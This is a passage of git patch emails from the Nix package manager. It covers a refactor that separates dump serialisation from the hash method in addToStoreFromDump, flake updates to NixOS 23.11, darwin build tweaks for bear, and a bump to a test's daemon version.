 src/libstore/local-store.hh                 |  3 +-
 src/libstore/remote-store.cc                | 20 +++++-
 src/libstore/remote-store.hh                |  3 +-
 src/libstore/store-api.cc                   | 47 ++++---------
 src/libstore/store-api.hh                   | 17 +++--
 src/nix-env/user-env.cc                     |  2 +-
 src/nix/develop.cc                          |  2 +-
 16 files changed, 137 insertions(+), 138 deletions(-)

diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 9ea266cf9..78f7f71ed 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -2092,7 +2092,7 @@ static void prim_toFile(EvalState & state, const PosIdx pos, Value * * args, Val
         })
         : ({
             StringSource s { contents };
-            state.store->addToStoreFromDump(s, name, TextIngestionMethod {}, HashAlgorithm::SHA256, refs, state.repair);
+            state.store->addToStoreFromDump(s, name, FileSerialisationMethod::Flat, TextIngestionMethod {}, HashAlgorithm::SHA256, refs, state.repair);
         });
 
     /* Note: we don't need to add `context' to the context of the
diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc
index d6047dd7e..bea2bb370 100644
--- a/src/libstore/binary-cache-store.cc
+++ b/src/libstore/binary-cache-store.cc
@@ -305,7 +305,8 @@ void BinaryCacheStore::addToStore(const ValidPathInfo & info, Source & narSource
 StorePath BinaryCacheStore::addToStoreFromDump(
     Source & dump,
     std::string_view name,
-    ContentAddressMethod method,
+    FileSerialisationMethod dumpMethod,
+    ContentAddressMethod hashMethod,
     HashAlgorithm hashAlgo,
     const StorePathSet & references,
     RepairFlag repair)
@@ -313,17 +314,26 @@ StorePath BinaryCacheStore::addToStoreFromDump(
     std::optional caHash;
     std::string nar;
 
+    // Calculating Git hash from NAR stream not yet implemented. May not
+    // be possible to implement in single-pass if the NAR is in an
+    // inconvenient order. Could fetch after uploading, however.
+    if (hashMethod.getFileIngestionMethod() == FileIngestionMethod::Git)
+        unsupported("addToStoreFromDump");
+
     if (auto * dump2p = dynamic_cast(&dump)) {
         auto & dump2 = *dump2p;
         // Hack, this gives us a "replayable" source so we can compute
         // multiple hashes more easily.
-        caHash = hashString(HashAlgorithm::SHA256, dump2.s);
-        switch (method.getFileIngestionMethod()) {
-        case FileIngestionMethod::Recursive:
+        //
+        // Only calculate if the dump is in the right format, however.
+        if (static_cast(dumpMethod) == hashMethod.getFileIngestionMethod())
+            caHash = hashString(HashAlgorithm::SHA256, dump2.s);
+        switch (dumpMethod) {
+        case FileSerialisationMethod::Recursive:
             // The dump is already NAR in this case, just use it.
             nar = dump2.s;
             break;
-        case FileIngestionMethod::Flat:
+        case FileSerialisationMethod::Flat:
         {
             // The dump is Flat, so we need to convert it to NAR with a
             // single file.
@@ -332,14 +342,11 @@ StorePath BinaryCacheStore::addToStoreFromDump(
             nar = std::move(s.s);
             break;
         }
-        case FileIngestionMethod::Git:
-            unsupported("addToStoreFromDump");
-            break;
         }
     } else {
         // Otherwise, we have to do th same hashing as NAR so our single
         // hash will suffice for both purposes.
-        if (method != FileIngestionMethod::Recursive || hashAlgo != HashAlgorithm::SHA256)
+        if (dumpMethod != FileSerialisationMethod::Recursive || hashAlgo != HashAlgorithm::SHA256)
             unsupported("addToStoreFromDump");
     }
     StringSource narDump { nar };
@@ -354,7 +361,7 @@ StorePath BinaryCacheStore::addToStoreFromDump(
             *this,
             name,
             ContentAddressWithReferences::fromParts(
-                method,
+                hashMethod,
                 caHash ? *caHash : nar.first,
                 {
                     .others = references,
diff --git a/src/libstore/binary-cache-store.hh b/src/libstore/binary-cache-store.hh
index 76de2d11a..7c2828309 100644
--- a/src/libstore/binary-cache-store.hh
+++ b/src/libstore/binary-cache-store.hh
@@ -125,7 +125,8 @@ public:
     StorePath addToStoreFromDump(
         Source & dump,
         std::string_view name,
-        ContentAddressMethod method,
+        FileSerialisationMethod dumpMethod,
+        ContentAddressMethod hashMethod,
         HashAlgorithm hashAlgo,
         const StorePathSet & references,
         RepairFlag repair) override;
diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index d92966a74..a9b8de123 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -1312,12 +1312,13 @@ struct RestrictedStore : public virtual RestrictedStoreConfig, public virtual In
     StorePath addToStoreFromDump(
         Source & dump,
         std::string_view name,
-        ContentAddressMethod method,
+        FileSerialisationMethod dumpMethod,
+        ContentAddressMethod hashMethod,
         HashAlgorithm hashAlgo,
         const StorePathSet & references,
         RepairFlag repair) override
     {
-        auto path = next->addToStoreFromDump(dump, name, method, hashAlgo, references, repair);
+        auto path = next->addToStoreFromDump(dump, name, dumpMethod, hashMethod, hashAlgo, references, repair);
         goal.addDependency(path);
         return path;
     }
diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc
index 873065e14..e1337f51d 100644
--- a/src/libstore/daemon.cc
+++ b/src/libstore/daemon.cc
@@ -401,11 +401,23 @@ static void performOp(TunnelLogger * logger, ref store,
             logger->startWork();
             auto pathInfo = [&]() {
                 // NB: FramedSource must be out of scope before logger->stopWork();
-                auto [contentAddressMethod, hashAlgo_] = ContentAddressMethod::parseWithAlgo(camStr);
-                auto hashAlgo = hashAlgo_; // work around clang bug
+                auto [contentAddressMethod, hashAlgo] = ContentAddressMethod::parseWithAlgo(camStr);
                 FramedSource source(from);
+                FileSerialisationMethod dumpMethod;
+                switch (contentAddressMethod.getFileIngestionMethod()) {
+                case FileIngestionMethod::Flat:
+                    dumpMethod = FileSerialisationMethod::Flat;
+                    break;
+                case FileIngestionMethod::Recursive:
+                    dumpMethod = FileSerialisationMethod::Recursive;
+                    break;
+                case FileIngestionMethod::Git:
+                    // Use NAR; Git is not a serialization method
+                    dumpMethod = FileSerialisationMethod::Recursive;
+                    break;
+                }
                 // TODO these two steps are essentially RemoteStore::addCAToStore. Move it up to Store.
-                auto path = store->addToStoreFromDump(source, name, contentAddressMethod, hashAlgo, refs, repair);
+                auto path = store->addToStoreFromDump(source, name, dumpMethod, contentAddressMethod, hashAlgo, refs, repair);
                 return store->queryPathInfo(path);
             }();
             logger->stopWork();
@@ -431,34 +443,23 @@ static void performOp(TunnelLogger * logger, ref store,
                 hashAlgo = parseHashAlgo(hashAlgoRaw);
             }
 
+            // Old protocol always sends NAR, regardless of hashing method
             auto dumpSource = sinkToSource([&](Sink & saved) {
-                if (method == FileIngestionMethod::Recursive) {
-                    /* We parse the NAR dump through into `saved` unmodified,
-                       so why all this extra work? We still parse the NAR so
-                       that we aren't sending arbitrary data to `saved`
-                       unwittingly`, and we know when the NAR ends so we don't
-                       consume the rest of `from` and can't parse another
-                       command. (We don't trust `addToStoreFromDump` to not
-                       eagerly consume the entire stream it's given, past the
-                       length of the Nar. */
-                    TeeSource savedNARSource(from, saved);
-                    NullFileSystemObjectSink sink; /* just parse the NAR */
-                    parseDump(sink, savedNARSource);
-                } else if (method == FileIngestionMethod::Flat) {
-                    /* Incrementally parse the NAR file, stripping the
-                       metadata, and streaming the sole file we expect into
-                       `saved`. */
-                    RegularFileSink savedRegular { saved };
-                    parseDump(savedRegular, from);
-                    if (!savedRegular.regular) throw Error("regular file expected");
-                } else {
-                    /* Should have validated above that no other file ingestion
-                       method was used. */
-                    assert(false);
-                }
+                /* We parse the NAR dump through into `saved` unmodified,
+                   so why all this extra work? We still parse the NAR so
+                   that we aren't sending arbitrary data to `saved`
+                   unwittingly, and we know when the NAR ends so we don't
+                   consume the rest of `from` and can't parse another
+                   command. (We don't trust `addToStoreFromDump` to not
+                   eagerly consume the entire stream it's given, past the
+                   length of the NAR.) */
+                TeeSource savedNARSource(from, saved);
+                NullFileSystemObjectSink sink; /* just parse the NAR */
+                parseDump(sink, savedNARSource);
             });
             logger->startWork();
-            auto path = store->addToStoreFromDump(*dumpSource, baseName, method, hashAlgo);
+            auto path = store->addToStoreFromDump(
+                *dumpSource, baseName, FileSerialisationMethod::Recursive, method, hashAlgo);
             logger->stopWork();
 
             to << store->printStorePath(path);
@@ -490,7 +491,7 @@ static void performOp(TunnelLogger * logger, ref store,
         logger->startWork();
         auto path = ({
             StringSource source { s };
-            store->addToStoreFromDump(source, suffix, TextIngestionMethod {}, HashAlgorithm::SHA256, refs, NoRepair);
+            store->addToStoreFromDump(source, suffix, FileSerialisationMethod::Flat, TextIngestionMethod {}, HashAlgorithm::SHA256, refs, NoRepair);
         });
         logger->stopWork();
         to << store->printStorePath(path);
diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc
index 305ed5b42..df14e979f 100644
--- a/src/libstore/derivations.cc
+++ b/src/libstore/derivations.cc
@@ -150,7 +150,7 @@ StorePath writeDerivation(Store & store,
         })
         : ({
             StringSource s { contents };
-            store.addToStoreFromDump(s, suffix, TextIngestionMethod {}, HashAlgorithm::SHA256, references, repair);
+            store.addToStoreFromDump(s, suffix, FileSerialisationMethod::Flat, TextIngestionMethod {}, HashAlgorithm::SHA256, references, repair);
         });
 }
 
diff --git a/src/libstore/dummy-store.cc b/src/libstore/dummy-store.cc
index e4f13b8f4..30f23cff9 100644
--- a/src/libstore/dummy-store.cc
+++ b/src/libstore/dummy-store.cc
@@ -61,7 +61,8 @@ struct DummyStore : public virtual DummyStoreConfig, public virtual Store
     virtual StorePath addToStoreFromDump(
         Source & dump,
         std::string_view name,
-        ContentAddressMethod method = FileIngestionMethod::Recursive,
+        FileSerialisationMethod dumpMethod = FileSerialisationMethod::Recursive,
+        ContentAddressMethod hashMethod = FileIngestionMethod::Recursive,
         HashAlgorithm hashAlgo = HashAlgorithm::SHA256,
         const StorePathSet & references = StorePathSet(),
         RepairFlag repair = NoRepair) override
diff --git a/src/libstore/legacy-ssh-store.hh b/src/libstore/legacy-ssh-store.hh
index ae890177b..ca2f115d2 100644
--- a/src/libstore/legacy-ssh-store.hh
+++ b/src/libstore/legacy-ssh-store.hh
@@ -72,7 +72,8 @@ struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Stor
     virtual StorePath addToStoreFromDump(
         Source & dump,
         std::string_view name,
-        ContentAddressMethod method = FileIngestionMethod::Recursive,
+        FileSerialisationMethod dumpMethod = FileSerialisationMethod::Recursive,
+        ContentAddressMethod hashMethod = FileIngestionMethod::Recursive,
         HashAlgorithm hashAlgo = HashAlgorithm::SHA256,
         const StorePathSet & references = StorePathSet(),
         RepairFlag repair = NoRepair) override
diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc
index 5f35cf3a8..56f8c5dd8 100644
--- a/src/libstore/local-store.cc
+++ b/src/libstore/local-store.cc
@@ -1148,7 +1148,8 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source,
 StorePath LocalStore::addToStoreFromDump(
     Source & source0,
     std::string_view name,
-    ContentAddressMethod method,
+    FileSerialisationMethod dumpMethod,
+    ContentAddressMethod hashMethod,
     HashAlgorithm hashAlgo,
     const StorePathSet & references,
     RepairFlag repair)
@@ -1201,7 +1202,13 @@ StorePath LocalStore::addToStoreFromDump(
     Path tempDir;
     AutoCloseFD tempDirFd;
 
-    if (!inMemory) {
+    bool methodsMatch = (FileIngestionMethod) dumpMethod == hashMethod;
+
+    /* If the methods don't match, our streaming hash of the dump is the
+       wrong sort, and we need to rehash. */
+    bool inMemoryAndDontNeedRestore = inMemory && methodsMatch;
+
+    if (!inMemoryAndDontNeedRestore) {
         /* Drain what we pulled so far, and then keep on pulling */
         StringSource dumpSource { dump };
         ChainSource bothSource { dumpSource, source };
@@ -1210,40 +1217,23 @@ StorePath LocalStore::addToStoreFromDump(
         delTempDir = std::make_unique(tempDir);
         tempPath = tempDir + "/x";
 
-        auto fim = method.getFileIngestionMethod();
-        switch (fim) {
-        case FileIngestionMethod::Flat:
-        case FileIngestionMethod::Recursive:
-            restorePath(tempPath, bothSource, (FileSerialisationMethod) fim);
-            break;
-        case FileIngestionMethod::Git: {
-            RestoreSink sink;
-            sink.dstPath = tempPath;
-            auto accessor = getFSAccessor();
-            git::restore(sink, bothSource, [&](Hash childHash) {
-                return std::pair {
-                    &*accessor,
-                    CanonPath {
-                        printStorePath(this->makeFixedOutputPath("git", FixedOutputInfo {
-                            .method = FileIngestionMethod::Git,
-                            .hash = childHash,
-                        }))
-                    },
-                };
-            });
-            break;
-        }
-        }
+        restorePath(tempPath, bothSource, dumpMethod);
 
         dumpBuffer.reset();
         dump = {};
     }
 
-    auto [hash, size] = hashSink->finish();
+    auto [dumpHash, size] = hashSink->finish();
+
+    PosixSourceAccessor accessor;
 
     auto desc = ContentAddressWithReferences::fromParts(
-        method,
-        hash,
+        hashMethod,
+        methodsMatch
+            ? dumpHash
+            : hashPath(
+                accessor, CanonPath { tempPath },
+                hashMethod.getFileIngestionMethod(), hashAlgo),
         {
             .others = references,
             // caller is not capable of creating a self-reference, because this is content-addressed without modulus
@@ -1269,32 +1259,19 @@ StorePath LocalStore::addToStoreFromDump(
 
             autoGC();
 
-            if (inMemory) {
+            if (inMemoryAndDontNeedRestore) {
                 StringSource dumpSource { dump };
                 /* Restore from the buffer in memory. */
-                auto fim = method.getFileIngestionMethod();
+                auto fim = hashMethod.getFileIngestionMethod();
                 switch (fim) {
                 case FileIngestionMethod::Flat:
                 case FileIngestionMethod::Recursive:
                     restorePath(realPath, dumpSource, (FileSerialisationMethod) fim);
                     break;
-                case FileIngestionMethod::Git: {
-                    RestoreSink sink;
-                    sink.dstPath = realPath;
-                    auto accessor = getFSAccessor();
-                    git::restore(sink, dumpSource, [&](Hash childHash) {
-                        return std::pair {
-                            &*accessor,
-                            CanonPath {
-                                printStorePath(this->makeFixedOutputPath("git", FixedOutputInfo {
-                                    .method = FileIngestionMethod::Git,
-                                    .hash = childHash,
-                                }))
-                            },
-                        };
-                    });
-                    break;
-                }
+                case FileIngestionMethod::Git:
+                    // doesn't correspond to serialization method, so
+                    // this should be unreachable
+                    assert(false);
                 }
             } else {
                 /* Move the temporary path we restored above. */
@@ -1303,8 +1280,8 @@ StorePath LocalStore::addToStoreFromDump(
 
             /* For computing the nar hash. In recursive SHA-256 mode, this
                is the same as the store hash, so no need to do it again. */
-            auto narHash = std::pair { hash, size };
-            if (method != FileIngestionMethod::Recursive || hashAlgo != HashAlgorithm::SHA256) {
+            auto narHash = std::pair { dumpHash, size };
+            if (dumpMethod != FileSerialisationMethod::Recursive || hashAlgo != HashAlgorithm::SHA256) {
                 HashSink narSink { HashAlgorithm::SHA256 };
                 dumpPath(realPath, narSink);
                 narHash = narSink.finish();
diff --git a/src/libstore/local-store.hh b/src/libstore/local-store.hh
index ba56d3ead..7eff1d690 100644
--- a/src/libstore/local-store.hh
+++ b/src/libstore/local-store.hh
@@ -180,7 +180,8 @@ public:
     StorePath addToStoreFromDump(
         Source & dump,
         std::string_view name,
-        ContentAddressMethod method,
+        FileSerialisationMethod dumpMethod,
+        ContentAddressMethod hashMethod,
         HashAlgorithm hashAlgo,
         const StorePathSet & references,
         RepairFlag repair) override;
diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc
index 0cae84828..8dfe8adda 100644
--- a/src/libstore/remote-store.cc
+++ b/src/libstore/remote-store.cc
@@ -509,12 +509,28 @@ ref RemoteStore::addCAToStore(
 StorePath RemoteStore::addToStoreFromDump(
     Source & dump,
     std::string_view name,
-    ContentAddressMethod method,
+    FileSerialisationMethod dumpMethod,
+    ContentAddressMethod hashMethod,
     HashAlgorithm hashAlgo,
     const StorePathSet & references,
     RepairFlag repair)
 {
-    return addCAToStore(dump, name, method, hashAlgo, references, repair)->path;
+    FileSerialisationMethod fsm;
+    switch (hashMethod.getFileIngestionMethod()) {
+    case FileIngestionMethod::Flat:
+        fsm = FileSerialisationMethod::Flat;
+        break;
+    case FileIngestionMethod::Recursive:
+        fsm = FileSerialisationMethod::Recursive;
+        break;
+    case FileIngestionMethod::Git:
+        // Use NAR; Git is not a serialization method
+        fsm = FileSerialisationMethod::Recursive;
+        break;
+    }
+    if (fsm != dumpMethod)
+        unsupported("RemoteStore::addToStoreFromDump doesn't support this `dumpMethod` `hashMethod` combination");
+    return addCAToStore(dump, name, hashMethod, hashAlgo, references, repair)->path;
 }
 
 
diff --git a/src/libstore/remote-store.hh b/src/libstore/remote-store.hh
index c51a21375..d630adc08 100644
--- a/src/libstore/remote-store.hh
+++ b/src/libstore/remote-store.hh
@@ -87,7 +87,8 @@ public:
     StorePath addToStoreFromDump(
         Source & dump,
         std::string_view name,
-        ContentAddressMethod method = FileIngestionMethod::Recursive,
+        FileSerialisationMethod dumpMethod = FileSerialisationMethod::Recursive,
+        ContentAddressMethod hashMethod = FileIngestionMethod::Recursive,
         HashAlgorithm hashAlgo = HashAlgorithm::SHA256,
         const StorePathSet & references = StorePathSet(),
         RepairFlag repair = NoRepair) override;
diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc
index c44612ec5..4356296d4 100644
--- a/src/libstore/store-api.cc
+++ b/src/libstore/store-api.cc
@@ -197,40 +197,23 @@ StorePath Store::addToStore(
     PathFilter & filter,
     RepairFlag repair)
 {
+    FileSerialisationMethod fsm;
+    switch (method.getFileIngestionMethod()) {
+    case FileIngestionMethod::Flat:
+        fsm = FileSerialisationMethod::Flat;
+        break;
+    case FileIngestionMethod::Recursive:
+        fsm = FileSerialisationMethod::Recursive;
+        break;
+    case FileIngestionMethod::Git:
+        // Use NAR; Git is not a serialization method
+        fsm = FileSerialisationMethod::Recursive;
+        break;
+    }
     auto source = sinkToSource([&](Sink & sink) {
-        auto fim = method.getFileIngestionMethod();
-        switch (fim) {
-        case FileIngestionMethod::Flat:
-        case FileIngestionMethod::Recursive:
-        {
-            dumpPath(accessor, path, sink, (FileSerialisationMethod) fim, filter);
-            break;
-        }
-        case FileIngestionMethod::Git:
-        {
-            git::dump(
-                accessor, path,
-                sink,
-                // recursively add to store if path is a directory
-                [&](const CanonPath & path) -> git::TreeEntry {
-                    auto storePath = addToStore("git", accessor, path, method, hashAlgo, references, filter, repair);
-                    auto info = queryPathInfo(storePath);
-                    assert(info->ca);
-                    assert(info->ca->method == FileIngestionMethod::Git);
-                    auto stat = getFSAccessor()->lstat(CanonPath(printStorePath(storePath)));
-                    auto gitModeOpt = git::convertMode(stat.type);
-                    assert(gitModeOpt);
-                    return {
-                        .mode = *gitModeOpt,
-                        .hash = info->ca->hash,
-                    };
-                },
-                filter);
-            break;
-        }
-        }
+        dumpPath(accessor, path, sink, fsm, filter);
     });
-    return addToStoreFromDump(*source, name, method, hashAlgo, references, repair);
+    return addToStoreFromDump(*source, name, fsm, method, hashAlgo, references, repair);
 }
 
 void Store::addMultipleToStore(
diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh
index 5163070b2..5f683a211 100644
--- a/src/libstore/store-api.hh
+++ b/src/libstore/store-api.hh
@@ -466,14 +466,23 @@ public:
      * in `dump`, which is either a NAR serialisation (if recursive ==
      * true) or simply the contents of a regular file (if recursive ==
      * false).
-     * `dump` may be drained
      *
-     * \todo remove?
+     * `dump` may be drained.
+     *
+     * @param dumpMethod What serialisation format is `dump`, i.e. how
+     * to deserialize it. Must either match hashMethod or be
+     * `FileSerialisationMethod::Recursive`.
+     *
+     * @param hashMethod How to compute the content address. Need not
+     * be the same as `dumpMethod`.
+     *
+     * @todo remove?
      */
     virtual StorePath addToStoreFromDump(
         Source & dump,
         std::string_view name,
-        ContentAddressMethod method = FileIngestionMethod::Recursive,
+        FileSerialisationMethod dumpMethod = FileSerialisationMethod::Recursive,
+        ContentAddressMethod hashMethod = FileIngestionMethod::Recursive,
         HashAlgorithm hashAlgo = HashAlgorithm::SHA256,
         const StorePathSet & references = StorePathSet(),
         RepairFlag repair = NoRepair) = 0;
@@ -772,7 +781,7 @@ protected:
      * Helper for methods that are not unsupported: this is used for
      * default definitions for virtual methods that are meant to be overriden.
      *
-     * \todo Using this should be a last resort. It is better to make
+     * @todo Using this should be a last resort. It is better to make
      * the method "virtual pure" and/or move it to a subclass.
      */
     [[noreturn]] void unsupported(const std::string & op)
diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc
index 2f9c988d5..8bebe2b9e 100644
--- a/src/nix-env/user-env.cc
+++ b/src/nix-env/user-env.cc
@@ -113,7 +113,7 @@ bool createUserEnv(EvalState & state, PackageInfos & elems,
         std::string str2 = str.str();
         StringSource source { str2 };
         state.store->addToStoreFromDump(
-            source, "env-manifest.nix", TextIngestionMethod {}, HashAlgorithm::SHA256, references);
+            source, "env-manifest.nix", FileSerialisationMethod::Flat, TextIngestionMethod {}, HashAlgorithm::SHA256, references);
     });
 
     /* Get the environment builder expression. */
diff --git a/src/nix/develop.cc b/src/nix/develop.cc
index 403178a5d..c1842f2d5 100644
--- a/src/nix/develop.cc
+++ b/src/nix/develop.cc
@@ -226,7 +226,7 @@ static StorePath getDerivationEnvironment(ref store, ref evalStore
     auto getEnvShPath = ({
         StringSource source { getEnvSh };
         evalStore->addToStoreFromDump(
-            source, "get-env.sh", TextIngestionMethod {}, HashAlgorithm::SHA256, {});
+            source, "get-env.sh", FileSerialisationMethod::Flat, TextIngestionMethod {}, HashAlgorithm::SHA256, {});
     });
 
     drv.args = {store->printStorePath(getEnvShPath)};

From 44f10f000a13fae6baae9c10767c6d300ff689a8 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Tue, 27 Feb 2024 13:45:18 +0100
Subject: [PATCH 526/654] flake: Update to NixOS 23.11

About time :)

This required disabling `bear` on darwin as it's currently broken (fixed
on master, but not yet on 23.11).
---
 flake.lock  |  8 ++++----
 flake.nix   | 18 +++++-------------
 package.nix |  2 +-
 3 files changed, 10 insertions(+), 18 deletions(-)

diff --git a/flake.lock b/flake.lock
index f0efb4036..a9022dbdc 100644
--- a/flake.lock
+++ b/flake.lock
@@ -34,16 +34,16 @@
     },
     "nixpkgs": {
       "locked": {
-        "lastModified": 1705033721,
-        "narHash": "sha256-K5eJHmL1/kev6WuqyqqbS1cdNnSidIZ3jeqJ7GbrYnQ=",
+        "lastModified": 1708971694,
+        "narHash": "sha256-mBXQ65IrCJbNgTrj0+6xdXpD9/U31AWPKdwGlOufhtI=",
         "owner": "NixOS",
         "repo": "nixpkgs",
-        "rev": "a1982c92d8980a0114372973cbdfe0a307f1bdea",
+        "rev": "4dd376f7943c64b522224a548d9cab5627b4d9d6",
         "type": "github"
       },
       "original": {
         "owner": "NixOS",
-        "ref": "nixos-23.05-small",
+        "ref": "nixos-23.11-small",
         "repo": "nixpkgs",
         "type": "github"
       }
diff --git a/flake.nix b/flake.nix
index 0bc70768e..479ec05c0 100644
--- a/flake.nix
+++ b/flake.nix
@@ -1,7 +1,7 @@
 {
   description = "The purely functional package manager";
 
-  inputs.nixpkgs.url = "github:NixOS/nixpkgs/nixos-23.05-small";
+  inputs.nixpkgs.url = "github:NixOS/nixpkgs/nixos-23.11-small";
   inputs.nixpkgs-regression.url = "github:NixOS/nixpkgs/215d4d0fd80ca5163643b03a33fde804a29cc1e2";
   inputs.flake-compat = { url = "github:edolstra/flake-compat"; flake = false; };
   inputs.libgit2 = { url = "github:libgit2/libgit2"; flake = false; };
@@ -10,20 +10,10 @@
 
     let
       inherit (nixpkgs) lib;
-
-      # Experimental fileset library: https://github.com/NixOS/nixpkgs/pull/222981
-      # Not an "idiomatic" flake input because:
-      #  - Propagation to dependent locks: https://github.com/NixOS/nix/issues/7730
-      #  - Subflake would download redundant and huge parent flake
-      #  - No git tree hash support: https://github.com/NixOS/nix/issues/6044
-      inherit (import (builtins.fetchTarball { url = "https://github.com/NixOS/nix/archive/1bdcd7fc8a6a40b2e805bad759b36e64e911036b.tar.gz"; sha256 = "sha256:14ljlpdsp4x7h1fkhbmc4bd3vsqnx8zdql4h3037wh09ad6a0893"; }))
-        fileset;
+      inherit (lib) fileset;
 
       officialRelease = false;
 
-      # Set to true to build the release notes for the next release.
-      buildUnreleasedNotes = false;
-
       version = lib.fileContents ./.version + versionSuffix;
       versionSuffix =
         if officialRelease
@@ -405,7 +395,9 @@
             XDG_DATA_DIRS+=:$out/share
           '';
           nativeBuildInputs = attrs.nativeBuildInputs or []
-            ++ lib.optional stdenv.cc.isClang pkgs.buildPackages.bear
+            # TODO: Remove the darwin check once
+            # https://github.com/NixOS/nixpkgs/pull/291814 is available
+            ++ lib.optional (stdenv.cc.isClang && !stdenv.isDarwin) pkgs.buildPackages.bear
             ++ lib.optional (stdenv.cc.isClang && stdenv.hostPlatform == stdenv.buildPlatform) pkgs.buildPackages.clang-tools;
         });
         in
diff --git a/package.nix b/package.nix
index 1f895e301..20796a386 100644
--- a/package.nix
+++ b/package.nix
@@ -154,7 +154,7 @@ in {
     in
       fileset.toSource {
         root = ./.;
-        fileset = fileset.intersect baseFiles (fileset.unions ([
+        fileset = fileset.intersection baseFiles (fileset.unions ([
           # For configure
           ./.version
           ./configure.ac

From bbef03872b64da2b65fc7dd2040e1e3f5257bea7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Tue, 27 Feb 2024 14:40:12 +0100
Subject: [PATCH 527/654] Bump the required daemon version for the impure-env
 test

The required version check was a bit too lenient, and
`nixpkgs#nixUnstable` was considered valid while it didn't have the fix.
---
 tests/functional/impure-env.sh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tests/functional/impure-env.sh b/tests/functional/impure-env.sh
index d9e4a34a2..cfea4cae9 100644
--- a/tests/functional/impure-env.sh
+++ b/tests/functional/impure-env.sh
@@ -1,7 +1,7 @@
 source common.sh
 
 # Needs the config option 'impure-env' to work
-requireDaemonNewerThan "2.18.0pre20230816"
+requireDaemonNewerThan "2.19.0"
 
 enableFeatures "configurable-impure-env"
 restartDaemon

From a0cb75d96f76a3be48b9319e26d8ad78ef4e4525 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Tue, 27 Feb 2024 18:45:51 +0100
Subject: [PATCH 528/654] Disable bear on all the things with darwin as
 hostPlatform

Just `stdenv.isDarwin` isn't enough because it doesn't apply to the
build platform, which mean that cross packages building from darwin to
another platform will have `isDarwin` set to false.
Replace it by `stdenv.buildPlatform.isDarwin`.
---
 flake.nix | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/flake.nix b/flake.nix
index 479ec05c0..baf81007f 100644
--- a/flake.nix
+++ b/flake.nix
@@ -397,7 +397,7 @@
           nativeBuildInputs = attrs.nativeBuildInputs or []
             # TODO: Remove the darwin check once
             # https://github.com/NixOS/nixpkgs/pull/291814 is available
-            ++ lib.optional (stdenv.cc.isClang && !stdenv.isDarwin) pkgs.buildPackages.bear
+            ++ lib.optional (stdenv.cc.isClang && !stdenv.buildPlatform.isDarwin) pkgs.buildPackages.bear
             ++ lib.optional (stdenv.cc.isClang && stdenv.hostPlatform == stdenv.buildPlatform) pkgs.buildPackages.clang-tools;
         });
         in

From cf3ef060ff7623c006e09ff51ba0f6d4e7bba704 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Tue, 27 Feb 2024 19:24:31 +0100
Subject: [PATCH 529/654] =?UTF-8?q?Disable=20the=20=E2=80=9Cstatic?=
 =?UTF-8?q?=E2=80=9D=20darwin=20stdenvs?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

They don't evaluate, and are probably not really useful (if at all).
---
 flake.nix | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/flake.nix b/flake.nix
index baf81007f..ceb572c0b 100644
--- a/flake.nix
+++ b/flake.nix
@@ -409,8 +409,9 @@
               (forAllStdenvs (stdenvName: makeShell pkgs pkgs.${stdenvName}));
           in
             (makeShells "native" nixpkgsFor.${system}.native) //
-            (makeShells "static" nixpkgsFor.${system}.static) //
-            (lib.genAttrs shellCrossSystems (crossSystem: let pkgs = nixpkgsFor.${system}.cross.${crossSystem}; in makeShell pkgs pkgs.stdenv)) //
+            (lib.optionalAttrs (!nixpkgsFor.${system}.native.stdenv.isDarwin)
+              (makeShells "static" nixpkgsFor.${system}.static)) //
+              (lib.genAttrs shellCrossSystems (crossSystem: let pkgs = nixpkgsFor.${system}.cross.${crossSystem}; in makeShell pkgs pkgs.stdenv)) //
             {
               default = self.devShells.${system}.native-stdenvPackages;
             }

From 945940f2efe273084319790f72a61b6b446d2882 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 28 Feb 2024 02:31:19 +0100
Subject: [PATCH 530/654] nixpkgs: nixos-23.11-small -> release-23.11
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Flake lock file updates:

• Updated input 'nixpkgs':
    'github:NixOS/nixpkgs/4dd376f7943c64b522224a548d9cab5627b4d9d6' (2024-02-26)
  → 'github:NixOS/nixpkgs/b550fe4b4776908ac2a861124307045f8e717c8e' (2024-02-28)
---
 flake.lock | 9 +++++----
 flake.nix  | 4 +++-
 2 files changed, 8 insertions(+), 5 deletions(-)

diff --git a/flake.lock b/flake.lock
index a9022dbdc..3070b4a45 100644
--- a/flake.lock
+++ b/flake.lock
@@ -34,16 +34,17 @@
     },
     "nixpkgs": {
       "locked": {
-        "lastModified": 1708971694,
-        "narHash": "sha256-mBXQ65IrCJbNgTrj0+6xdXpD9/U31AWPKdwGlOufhtI=",
+        "lastModified": 1709083642,
+        "narHash": "sha256-7kkJQd4rZ+vFrzWu8sTRtta5D1kBG0LSRYAfhtmMlSo=",
         "owner": "NixOS",
         "repo": "nixpkgs",
-        "rev": "4dd376f7943c64b522224a548d9cab5627b4d9d6",
+        "rev": "b550fe4b4776908ac2a861124307045f8e717c8e",
